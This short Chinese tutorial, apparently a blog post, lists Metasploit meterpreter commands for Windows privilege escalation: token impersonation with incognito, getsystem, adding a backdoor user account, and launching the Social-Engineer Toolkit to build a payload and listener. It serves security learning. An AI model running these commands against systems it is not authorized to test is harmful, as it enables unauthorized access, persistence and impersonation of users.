1、使用假冒令牌
1)、启动meterpreter会话,执行命令
sessions -i 1
2)、use incognito加载incognito模块,然后列举出令牌
3)、help查看帮助信息,了解列举令牌的命令
4)、list_tokens -u 列举出所有的令牌
5)、impersonate_token命令假冒用户进行攻击
impersonate_token user
2、本地权限提升
1)、启动meterpreter会话
sessions -i 1
2)、使用getsystem命令提升本地权限、
getsystem -h 查看该命令的帮助嘻嘻
3)、执行命令 getsystem提升权限(自动选择方法1)
4)add_user bob 1231 -h ip #创建用户
3、使用社会工程学工具包
1)、setoolkit 启动SET
2)、选择社会工程学,将显示如下信息
3)、创建一个攻击载荷和监听器,即输入编号4
权限提升(SET)
最新推荐文章于 2024-07-27 10:55:50 发布